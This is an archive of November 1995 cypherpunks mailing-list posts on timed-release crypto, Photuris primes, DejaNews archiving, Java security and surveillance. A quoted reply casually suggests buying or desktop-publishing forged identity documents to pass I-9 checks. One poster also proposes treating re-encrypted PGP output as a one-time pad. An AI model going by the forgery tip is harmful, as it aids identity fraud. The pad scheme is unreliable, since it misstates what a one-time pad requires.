> not to return the pieces until Date X, or is holding onto a sealed message
> but asking that the decryption keys not be returned until Date X. I don't
> see the real difference, modulo some minor factors. In neither case can the
> original message be reconstructed unless n out of m of the escrow agents
> provide the pieces.

Here are some attacks where my scheme is more resistant.  I'll suppose
that Alice is writing a bond, i.e., time-delayed cash, to Bob.


1. Alice does not really write a bond

In my plan, Alice gives Bob the message along with a certificate saying
that it is a bond.  If the message is actually not a bond, Bob can
demonstrate fraud upon the maturity date without revealing his identity,
by posting the now-readable message along with the contradictory signed
statement from Alice.

In your plan, Alice cannot provide the actual message to Bob, nor
prove that she even sent anything through the blind remailer network.
Bob would have to ask her to sign a certificate saying that she wrote
a bond to Bob for $n to mature on date X; she may not be willing to
admit that in a publicly demonstrable way.  And if she defrauded Bob,
he cannot prove he did not receive a bond.


2. The crypto houses lose keys/messages

In my plan, the crypto house's signature on the public key it issues
guarantees that the secret key will be available upon the maturity date.
If the house loses the secret key, then anyone can prove this, again
anonymously, by publishing the signed public key and asking anyone to
try to purchase the corresponding secret key.  The house cannot say it
is a false claim.  The unreliable house hemorrhages reputation, and Bob
still has his money as long as n houses were reliable.

In fact, even if Bob ca'n't trust n houses, he can still hedge.  He would
just buy a futures coupon saying that the house in question will lose
a key.  This is a classic use of hedging, and it allows him to recover
his money, anonymously.

In your plan, you just have to hope the remailers don't lose more than
m-n parts.  You rely on reputation-raters to judge reliability in a
probabilistic manner.  This works ok currently, with amateur remailers,
but not in a future world held to the 100% standards of financial
reliability.  (And those standards are very high.  Consider the public
reaction if you saw proof that a bank had "lost" someone's checking
account, one among a million.)


3. The crypto houses leak keys/messages

In my plan, this is ok.  You need both the keys *and the message*
to decrypt.  Only Bob holds the message.  (It's axiomatic that you can
keep a secret out of self-interest; your personal private key is such
a secret.)  In fact, at the maturity date, the secret keys will become
available to anyone, and Bob still won't be hurt.

Meanwhile, crackers have incentive to steal keys even without breaking
messages, because they can use them to make a profit on "Megahouse leaks
keys" futures, by posting the secret key matching a signed public key.
This can be anonymous, or they can use it to raise their nym's reputation
among crackers.  Because Megahouse knows it will be caught *every time*
it leaks, it must keep 100% financial-quality security.  This is an
excellent failure mode because all failures will be public.

In your plan, you just have to hope fewer than n pieces are made available
to the cracking ring.  And when you get a bond consisting of double-spent
bills, you ca'n't tell who broke security.  This is intractable for a
reputation-rater to determine to the necessary standards of accuracy.


4. Alice leaks the message

This is "fraud through negligence" and is treated as in case 1.  If Bob
thinks it's likely, he can hedge by buying a "Alice shown untrustworthy"
futures coupon.  (Those will be *so* useful.)


Because of the two-part design of a delayed message, it takes collusion
by those in possession of ciphertext *and* keys to unseal a message.
Before the maturity date, only Alice and Bob have the message, and only
the banks have the keys.  The message is of value only in that it will
be valuable in the future along with the then-available secret keys.
(Or, I suppose, possibly to prove fraud; that's of even more value.)
All collusion can be righted, everything is anonymous unless reputations
are involved, and all fraud is publicly exposed.

These are interesting properties.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ81SeyjYMb1RsVfAQG5GQP/RP5IkcQUFo++aBWHUmoTGuIBphykQxp/
HR40yt4GzIJQUIpEbM7iiD6Dk9hDLoF4GY9MQrPnxmhfGu4uITxYeDMfsPHJLv01
xCu9//xYJ9Usb3eWJFSURhBkSQg05T4upZX2KTj5NlTB4dbMJumReDeUix236FaU
W2eRxdiw0Us=
=zCpp
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William Allen Simpson" <bsimpson@morningstar.com>
Date: Tue, 7 Nov 1995 23:33:13 +0800
To: cypherpunks@toad.com
Subject: Re: Photuris Primality verification needed
Message-ID: <1997.bsimpson@morningstar.com>
MIME-Version: 1.0
Content-Type: text/plain


I wish to roundly thank all those that responded to our need for
verification.  We had several excellent responses.  The primes have now
been better verified using Miller-Rabin with different platforms, and
with separately coded math libraries.  More exhaustive testing is
ongoing.

Thanks are due to Wei Dai and Frank A Stevenson, as well as independent
math libraries by Rich Schroeppel and Eric Young.

Bill.Simpson@um.cc.umich.edu
          Key fingerprint =  2E 07 23 03 C5 62 70 D3  59 B1 4F 5E 1D C2 C1 A2




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William Allen Simpson" <bsimpson@morningstar.com>
Date: Tue, 7 Nov 1995 23:31:52 +0800
To: bal@martigny.ai.mit.edu
Subject: Re: Photuris Primality verification needed
Message-ID: <1999.bsimpson@morningstar.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
>    > Recently, someone asked for a smaller prime of only 512-bits for speed.
>    > This is more than enough for the strength of keys needed for DES, 3DES,
>    > MD5 and SHA.  Perhaps this would be easier to have more complete and
>    > robust verification as well.
>
> Our practical experiences with discrete logs suggests that the effort
> required to perform the discrete log precomputations in (a) is slightly
> more difficult than factoring a composite of the same size in bits.  In
> 1990-91 we estimated that performing (a) for a k-bit prime modulus was
> about as hard as factoring a k+32-bit composite.  [Recent factoring work
> has probably changed this a bit, but it's still a good estimate.]
>
Thanks.  I have added the [from Schneier] estimate

   e ** ((ln p)**1/2 * (ln (ln p))**1/2)

and number field sieve estimate

   e ** ((ln p)**1/3 * (ln (ln p))**2/3)

to the Photuris draft, with a small amount of explanation.

Hilarie Orman posted that 512-bits only gives an order of 56-bits
strength, 1024-bits yeilds 80-bits strength, and 2048 yields 112-bits
strength.  I do not have the facilities to verify her numbers.

As most of us agree that 56-bits is not enough (DES), the 512-bit prime
seems a waste of time and a tempting target.  I'd like to drop it, but
Phil is inclined to keep it with a disclaimer.

Bill.Simpson@um.cc.umich.edu
          Key fingerprint =  2E 07 23 03 C5 62 70 D3  59 B1 4F 5E 1D C2 C1 A2




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 7 Nov 1995 23:30:52 +0800
To: cypherpunks@toad.com
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <Pine.NXT.3.91.951107144209.255A-100000@oe1>
Message-ID: <Pine.HPP.3.91.951107154858.9847A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995, Oliver Huf wrote:

> It's inherent. You simply can't apply US-law to non-US-citizens outside
> the U.S.!  

Well, also (?) the Exxon bill tries to do just that.

If you put up 'indecent' material at your .de site that persons in the
US can ftp or browse or whatever, and the Exxon bill passes, you can
be sentenced to (at least) 2 years jail in the US. Presumably, since
they don't think you are as important as the infamous ex Panama
president, they won't come and get you, but might meet you at the
airport if you ever plan to visit the US. (They will not try to
get you sentenced in a German court since you haven't committed any
crime in Germany, and the German Government will probably not
extradite you - I'm not familiar with German extradition laws, though.)

With only one military superpower left we can expect it's jurisdiction
to expand as it seems fit.

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Tue, 7 Nov 1995 11:03:53 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: RE: using pgp to make an otp
Message-ID: <01HXC3AEU9BM91Y89B@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

> While in theory the output of PGP would be ``random'' enough for a
> one-time pad, you need to take into account that there is ``header''
> information in a PGP message.  This info in the first several bytes
> indicates which key was used, how big the message is, whether the
> receiving PGP should save the decrypted file, etc. This part is not
> very random at all.

i understand the non-random portions of the pgp output, which is why i
specified in my origional message that the 1st 20 or so lines would find
their way to the bit bucket.

> The weakness in this method is that the ``key'' to the OTP is composed
> of the PGP encryption key and the plaintext used to generate the
> pad.  Both would have to be fairly well protected to prevent a bad
> guy from either a) generating his own copy of the OTP by obtaining
> the key and plaintext or b) forcing you to use a known OTP by munging
> your copy of the key or plaintext.

i'm confused here. how would the 'key' to the otp be related to my pgp
encryption key? if i strip off all the identifying information that pgp
uses to recognise how to decrypt a message, and destroy the 'clean' copy of
the file(s) that eventually became part of my otp, how could the resulting
output be tied to my key? if it could, then pgp is less secure than i give
it credit for being.

if your objection is based on the fact that my public key is a known entity,
, this can easily be bypassed by creating a brand new key from a freshly
unzipped copy of pgp. use that key to create the otp, then destroying the
key(s) used to create it.

> This technique does have its uses.  For instance, if you use DES you
> can ``seed'' it with a value, then by re-encrypting the output of DES
> repeatedly you can generate an essentially random sequence of
> values.  This can be used as a OTP for a stream cypher.

isn't this essentially what i'm doing? if it is necessary, i can do
this...(assuming a virgin key)
1. create a cyphertext of a file.
2. strip the indentifying lines.
3. create a new cyphertext from the resulting file. 
4. repeat until paranoia level < comfort zone.

my point here is that _if_ pgp output is random enough, i wouldn't need
hardware. even i, with my extremely limited programming skills could create
a .cmd file or program that could be used as imput for a stream cypher.

imo, for crypto to be useful, it has to be easy. i'm trying to find a way
to do this that can be implemented anywhere.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 04:09:37 +0800
To: Stephen Whitaker <cypherpunks@toad.com
Subject: Re: nym-compoop
Message-ID: <acc2c76d080210041e54@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[I have taken the liberty of deleting "speaker@leg.state.vt.us"  and
"villuzzi@leg.state.vt.us" from the cc: list, as I think cross-pollinating
our list with state asssembly houses is even worse than being "assimilated"
by wwwbuyinfo and e$-list.]


At 2:35 AM GMT 11/6/95, Stephen Whitaker wrote:

>Eating my tasty crow gives rise to another question relating to the timing
>and continuity of these threads: How did the first responder on the RE:
>134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
>of 7:19AM on Nov 5? Which way is this thing spinnin?

Have you heard of time zones?

The first message, from Anonymous, was sent from the Replay remailer (in
Amsterdam, I recall).

Date: Sun, 5 Nov 1995 07:20:12 +0100
Subject: lp (134.222.35.2)?
To: cypherpunks@toad.com
From: nobody@REPLAY.COM (Anonymous)

07:20 in the +0100 timezone is of course 22:20 of the previous day
(Saturday) in the -0800 time zone.

The reply by Spero was sent

Date: Sat, 4 Nov 1995 22:48:39 -0800 (PST)
From: Simon Spero <ses@tipper.oit.unc.edu>
X-Sender: ses@chivalry
To: Anonymous <nobody@REPLAY.COM>

Looks harmless to me.

However, there is increasing evidence the intelligence agencies have
managed to open up a portal in time, using the tachyonic devices being
manufactured by Tachytronx, of Woodland Hills.

These time portals are used by Science Applications to launder money back
to eras in which it was needed.

One of the major remailers is located on a system called "Portal," which
ought to be enough to convince anyone in these paranoic times.

--Klaus! von Future Prime, whose chronotransport secrets now stand revealed






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Whitaker <whitaker@sover.net>
Date: Thu, 9 Nov 1995 04:15:04 +0800
To: cypherpunks@toad.com
Subject: nym-compoop
Message-ID: <199511060335.WAA04917@maple.sover.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm glad "nobody" thinks I'm a nym for being a good eight hours:fifty-nine
minutes out of step and having lowered my reputation in his/her eyes. Now
I'll ask my question again, which apparantly got lost in the collective
groan of my stale post:

        Are there ways for someone with access to modify router tables 
        to constantly create alternate paths at other routers 
        which would serve to end-around any such snoops?

This question is now offered in the context of the _hypothetical_situation_
of there being snoops out here in the first place. Later I'll ask about
sniffing for sniffers.

One reason for this post is the fact that certain ambitious bureaucrats here
in Vermont have decided to build, own and control the internet, connecting
governments, schools and a few businesses. There is no encryption in use by
the government agencies and they have let the school hackers and teachers on
now to share the T-1 backbone with the state agencies and contractors
(medicaid/EDS) carrying personal information collected and managed by state
government. 

These [ir]responsible parties refuse to provide any documentation requested
under public records law demonstrating that a security plan or practice is
in place. The high schools are offered 56K circuits for $5K/annual and a
share of a gov'ment network manager who wont answer his e-mail and doesn't
know where to begin looking for copies of it, when it too is requested under
our public records laws. 

Our governor stated in his address to the legislature that these 56K lines
will let an "unlimited number of students access the internet
simultaneously". Anybody got a bridge?

I sure would like to hear from some folks who would be willing to aid in
paying close attention, discussing the implications and appropriateness of
encryption technologies for this situation, aiding in testing for sniffers,
etc. This request is offered as an attempt to keep a step ahead of the
public/private competition, privacy accident-waiting-to-happen and the
surveillance potential/practice of such a beast.

If someone who feels strongly that this is off-topic for this list makes
that case I'll carry my inquiry elsewhere, after a little cross-fire, of
course. I even went back and just now read the "Welcome to" message to see
whether these issues fall withih the scope.

I can hardly find anyone who even cares about the fact that our legislature
relies on the executive branch gov-net managers for their port/connection on
the internet router. They also rely on the executive branch for
troubleshooting their novell LAN. Does anyone else see a separation of
powers issue or privacy issue here? Note that I cc: the speaker, who cares
but doesn't yet grasp the implications. Feel free to write him directly. His
name is Michael Obuchowski, Obe for short, <speaker@leg.state.vt.us>, tell
him I sent you.

At this point offering encryption software to school age kids is a whole lot
easier than convincing bureaucrats that it's a good practice. This wont
solve the problem of poor practice by government though. Unfortunately this
will also likely frighten the school network techies, administrators and
school board members.

Anybody have a copy of any good, tight, discovery orders which can be useful
in gaining court ordered access to prevent destruction of evidence and for
combing the electronic files and e-mail of these accountable public servants
to demonstrate that they don't know what there doing? (responses to the
legal points by private e-mail please. Do I come across as litigious?)

The Boston Globe did a good front page story a week or ten days ago entitled
"e-mail as evidence". Mostly the story was relating to lawyers and
consultants making big money aiding corporations to assure that the really
damaging, unencrypted e-mail is thoroughly scrubbed from all systems.

Back to where this started:
Eating my tasty crow gives rise to another question relating to the timing
and continuity of these threads: How did the first responder on the RE:
134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
of 7:19AM on Nov 5? Which way is this thing spinnin?

Stephen Whitaker
P. O. Box 1331
Montpelier, Vermont
05601-1331
802.479.6118





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 9 Nov 1995 04:12:03 +0800
To: cypherpunks@toad.com
Subject: Re: using PGP only for digital signatures
In-Reply-To: <199511060208.VAA14123@panix.com>
Message-ID: <yDL5DD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> writes:
> >Proving legal residency requires a combination of two documents, one each
> >from specified lists. Most commonly a driver's license, green card (which
> >is actually pink), or birth certificate from list A, and a social
> >security card from list B.
>
> You need proof of citizenship or residency and proof of identity.  Passport
> and naturalization papers work for both.  Otherwise you have to pay the $25
> to the guy on the corner for a birth certificate and drivers license.  Or
> DTP it yourself since employers aren't very good at checking papers.  Or
> dodge the whole thing and work for yourself.

I've had to deal with I-9 twice in the last 6 months; both times they happily
accepted my U.S.Passport as both the proof of identity and the proof of work
authorization. The naturalization certificate is a little tricky because it's
not supposed to be photocopied. I suppose the h.r. would take it (because it's
listed on the I-9) and photocopy it despite the warning on it. :)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 11 Nov 1995 08:45:12 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <Pine.3.89.9511061651.D23552-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511062347.PAA21652@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> I figured I'd send this to you as a private note, but then I figured 
> this thing really is scary and has a lot to do with anonymity. 
> Watch out folks. Litte Brother is saving everything you've ever said on 
> usenet. Your old posts just won't go away. 

	This is where I step in. ;-)
	DejaNews will soon be putting up a privacy statement where
they refer people to my site if they want privacy. (I haven't cheked,
it may be up there already.)

> 
> (Not that someone who is so open in his views and true name as yourself 
> would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived 
> yet. It's bad enough they have rec.)
> 
> Ps. I will of course run searches on every other address that the who
> command on majordomo@toad.com supplies me with, so watch what you say 
> ladies, gents and otherwise. ;->
> Get those 'nyms ready.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org
"I don't want to get into the t-shirt business."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 11 Nov 1995 08:44:38 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] DejaNews all over again--a URL for Usenet Searching
Message-ID: <9511062238.AA04563@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
> http://dejanews.com/
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).

Unfortunately, it does not archive alt, soc, talk,  or *.binaries (the latter is
probably a blessing). Specialized news grepping is still useful - see
http://www.iii.net/users/trei/usenet.html for an example.





Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 11 Nov 1995 08:44:47 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <9511061047.AA13370@all.net>
Message-ID: <199511062306.SAA13941@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!
> 
> >From the Java Web pages (as combined in Firewalls/BoS):
> 
> > The language's security features (not just applets):

[Long list of bullshit deleted]

 "Dr" Cohen. If you want to criticize Java, why not read the technical
papers rather than spewing questions and assertions based from ignorance.
When you want to criticize a piece of engineering, you don't look
at the feature list or white paper. As is made clear in your post,
you don't know the meanings of phrases used in the Java paper, nor do
you understand how the machinery works. (e.g. byte code verifier)

-Ray








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 11 Nov 1995 08:44:47 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <951106.181650.2r0.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, tcmay@got.net writes:

> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
>
> http://dejanews.com/

Just a pointer to the thread in comp.society.privacy re the Dejanews
"Author Profiles".  I expect most any c'punk expects their words to last
forever and eventually get cross-referenced, but some people are getting
really tweaked about seeing all their posting activity correlated.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ6mmBvikii9febJAQFhywP9H5leIfYlmDABeozti6ZAuT+QG/4kR1Aw
6LGEsVtRmyGY6nyXxJ905TRNHk2jegbR2nXEyXEcB+B5cI9Ef1+wqY7JRlWY90gT
KfaDKSTMMX5clXcy0RqGeXJfOJ2QF7vLAwRV87pCH8kVNStfSeMFiSFZSRc75dP2
s6UrpmF0pPw=
=Wyc3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 11 Nov 1995 08:44:23 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <Pine.3.89.9511061819.A32268-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 6 Nov 1995, Timothy C. May wrote:

> A good way for newcomers to find out what's been written on some topic that
> interests them, or to see who's writing what. (I checked out the index for:

Lycos includes the entire cpunks archive at hks.net (not just the 
address, the whole damn archive can be keyword searched), also another nice 
method. Did me wonders for a term paper.
Will have to do until keyword searches are added to the archive itself.

(wildcard searches also work at dejanews, which gives me 68 hits for 
tcmay@* , including your sensemedia address. Somehow I don't think any of 
the klaus@* addresses are yours)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 05:39:26 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
Message-ID: <acc4182012021004674b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



First, let me congratulate Michael Shields for working on this problem, and
for (possibly?) coming up with a cleaner scheme.

I confess that I'm not clear on how his scheme differs from mine. Let me
hasten to add that my 1993 proposal was intended to be more conceptual than
practical, to illustrate how distibuted escrow agents (escrow in the real
sense, not in the GAK sense) could be used to "send messages into the
future," a tool that has several intriguing applications, some of which
Michael explores in the second part of his post.

At 12:09 AM 11/7/95, Michael Shields wrote:

>In the May proposal, when you have a message to be encrypted, you
>encrypt it with a session key, optionally split that key with an n-of-m
>scheme, and then send the key into a network of escrow agents, which are
>instructed to hold the message for a given period of time.  You then
>hold onto the encrypted message, though you need not keep it secret.
>Conceptually, you have encrypted a message and then remailed the key to
>yourself in such a way that it will take X length of time to arrive.

Sending either the pieces of the message or the pieces of the key seem
closely related to me (they go together). In principle, it is only the key
that counts, so that is what I would focus upon.

>I have a simpler, public-key plan.  When you want to keep a message
>secret until date X, you ask your favorite crypto house to generate a
>key pair and hold the secret key until date X.  You then encrypt your
>message with the public key, and again hold onto the encrypted message.
>N-of-m trust management can be implemented by secret-sharing your message
>and encrypting each with a key generated by a different crypto house.

This seems to be saying the same thing. In both cases, "Alice" is either
distributing a message to"Bob," "Charles," "Donna," etc., with instructions
not to return the pieces until Date X, or is holding onto a sealed message
but asking that the decryption keys not be returned until Date X. I don't
see the real difference, modulo some minor factors. In neither case can the
original message be reconstructed unless n out of m of the escrow agents
provide the pieces.

I hope we are not miscommunicating because of terminology or because of the
continuing Net problem of not being able to draw pictures showing what is
going on.


>I'll let everyone tear into this for a few days, and then I'll put up a
>server for timed-release key generation, charging maybe c$1.  I'd like
>to then enhance it to be capable of issuing bonds and loans denominated
>in c$.  (I like the cyberbucks trial because it's officially play money,
>so there aren't any regulatory burdens.)  This should be interesting.

In any case, I look forward to seeing reaction to this. This could be an
important service. (In many ways much more interesting than fairly mundane
"Internet commerce" applications.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 05:37:51 +0800
To: cypherpunks@toad.com
Subject: Paranoia Has Its Uses
Message-ID: <acc432a115021004a17f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:10 AM 11/7/95, Carl Ellison wrote:
> ``According to the former head of Romania's secret police, Ion Mihai
>Pacepa, there had been ten million microphones in a country of twenty-three
>million people.  That would mean that nearly everyone had been listened to
>and then blackmailed into listening and reporting on others.  A maze of
>psychic tunnels led from one person to another.'' [Andrei Codrescu, "The
>Hole In The Flag", pp. 21-22]

This was the Romanian version of key escrow, don't you know?

"Conversation Escrow" was scrupulously safeguarded in Ceausescu's Romania,
with conversations only unlocked if a "court order" was obtained lawfully.

(Of course, governments get to make the laws, get to enforce them, and so
it goes.)

Theodore Roszak, influential author of "The Making of the Counterculture"
(1969), was bemoaning the apparent distrust people now have in governments,
and thinking he and his generation are partly to blame for the current
paranoia and mistrust. He was bemoaning the fact that nobody trusts that
government can fix society's problems, that everyone from leftists to
rightists apparently hates the way government works.

Relevance? Next time someone mentions "safeguards" in connection with GAK,
remind them about Tricky Dick and his "Enemies List." Or about possibly
greater abuses by other presidents. Remind them of what might happen if a
Religious Right president is trying to crack down on abortions,
pornography, and drugs.

This may make a doubter out of someone. It may be paranoia, but paranoia
has its uses.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Thu, 9 Nov 1995 05:37:30 +0800
To: sameer <sameer@c2.org>
Subject: Re: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE
Message-ID: <199511070413.XAA07602@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


I've always read with interest Sameer's notes, and I also enjoyed this one.
I just can't figure out why he's writing it (spelling and grammar errors aside):

At 07:52 11.06.1995 -0800, sameer wrote:
>For Immediate Release
>Date: Nov 6th, 1995
>Contact: Sameer Parekh 510-601-9777 sameer@c2.org
>
>PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE

This title and the opening paragraphs seem unnecessarily (and
misleadingly[*]) alarmist, given the recent spate of similar mass-media
articles.  After the lead and second paragraphs repeatedly talk about
"holes", "make viruses and other malicious programs possible", etc., it
isn't until the third paragraph that we read a calmer quote:

[*] Java isn't really 'Internet security software', and the students didn't
find a hole in any current version according to the rest of the text.

>"While we did find some interesting holes, we believe these can be
>addressed and Java could make a good standard for remote code on the
>Web, if an effective security policy is defined."

The opening paragraphs sure didn't reflect this.  Then:

>The holes they found exist only in the alpha release of HotJava. The
>beta release, which is the version found in the widely-used Netscape
>Navigator 2.0b1J is not vulnerable to these attacks.

They do?  It's not?  Then... why mention it at all?!

If this is so, it's a dead issue, old news, passe'.  Why another alarmist
press release (other than to promote Community ConneXion's decision to add
Java to its hit list <grin duck & run>)?  The public's paranoid enough about
net commerce; why should we, of all people, fan the flames?

This isn't to bash Sameer, whose posts I always enjoy reading.  I'm just a
bit puzzled by this one...

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 Nov 1995 17:36:21 +0800
To: cypherpunks@toad.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511070722.XAA05420@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:

> WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!

> > 4.2 Security in the Java Environment
> > 
> > Security commands a high premium in the growing use of the Internet
> > for products and services ranging from electronic distribution of
> > software and multimedia content, to "digital cash". The area of
> > security with which we're concerned here is how the Java compiler and
> > run-time system restrict application programmers from creating
> > subversive code.

[long list of important questions deleted ...]

Essentially, I think that all of this will distill to a single issue,
vis-a-vis Java or any other paradigm which wishes to represent itself as
*secure*.

Where is the security review role placed within the project development
life cycle?? 

Is it at Design Concept?  Or during Application Development?  Or is it
done last, after design completion, after all of the programming is
complete and the production people are involved in operational turnover. 

Or is it done at all?

This concept is not new, and should not present any problems to anyone in
the industry.  Even John Q. Public will understand it, if we use a simple
construction analogy. 

If you want to build a secure house, your security doesn't start AFTER the
house is built.  It has to start at a very early stage.  It starts before
the blueprints are made, when you specify that you want a concrete
windowless box located on a quiet street at the end of a cul-de-sac.  

That is simple and obvious. 

You certainly don't have *security* if after building a glass house on
Main Street, if after the design is finished, the footings have been
poured, and the key is about to be turned over to the occupant; if then,
as an afterthought you put a single strong deadbolt on the front door to
"secure" it. 

Anyone who can't or won't quite grasp this idea is either willfully
attempting to steer gullible individuals astray, or is congenitally
stupid. 

It's time to call a spade a spade. 

> What exactly does this mean?
> 
> > While all this checking appears excruciatingly detailed, by the time
> > the byte code verifier has done its work, the Java interpreter can
> > proceed knowing that the code will run securely. Knowing these
> > properties makes the Java interpreter much faster, because it doesn't
> > have to check anything. 

Yikes!!  I'll leave this for someone else to address.  This sounds to me
like a variation on virus scanning.  I think that there are far more
reputable virus experts than I who can comment and expand on *flaws* with 
that approach. 

> No runtime checking whatsoever.  Get past the supposed verifier, and you
> have free run of the machine.  A single verifier bug or inadequacy, and
> the world is unsafe for electronic commerce. 

As someone who *vividly* remembers October, 1987 and the near economic
meltdown which was BARELY averted by the Fed, a near meltdown which
occurred because of the interactions of systems far less intelligent or
complex than those we routinely utilize today, systems which directly
interface not only to each other, but have undocumented, non-predictable
interactions with "soft and wet" systems, I might have some serious
concerns. 

Then again, it is _only_ the economy, isn't it? 

> ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF.
> 
> P.S.
> 
> When: Tuesday, November 7, 8AM
> Where: The Hilton, Washington D.C. (the CSI conference)
> The talk: 50 Ways to Attack Your World Wide Web Systems
> 
> If you want a chance to heckle - be there.

